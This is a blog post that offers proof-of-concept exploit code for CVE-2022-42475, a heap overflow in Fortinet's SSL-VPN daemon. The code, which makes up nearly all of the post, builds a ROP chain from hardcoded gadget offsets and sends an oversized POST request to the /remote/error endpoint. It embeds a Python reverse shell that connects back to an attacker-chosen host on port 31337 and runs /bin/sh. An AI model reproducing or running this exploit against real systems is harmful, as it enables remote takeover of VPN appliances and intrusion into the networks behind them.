pudeopie's Blog - cve-2022-42475

POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon

Notes

This is a quick and dirty POC that will probably not work anywhere unless you are extremely lucky. It is version dependent and contains some hardcoded offsets which will most likely change from one system to another.

import socket
import ssl
from pwn import *
import time
import sys
import requests
context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"
#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1
#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000
scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)
ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""
try:
with socket.create_connection((target_host, int(target_port,10))) as sock:
with context.wrap_socket(sock, server_hostname=target_host) as ssock:
ssock.settimeout(2)
context.verify_mode = ssl.CERT_NONE
payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
ssock.sendall(tosend)
r = ssock.recv(10024)
except Exception as e:
print("Exception occurred :"+ repr(e))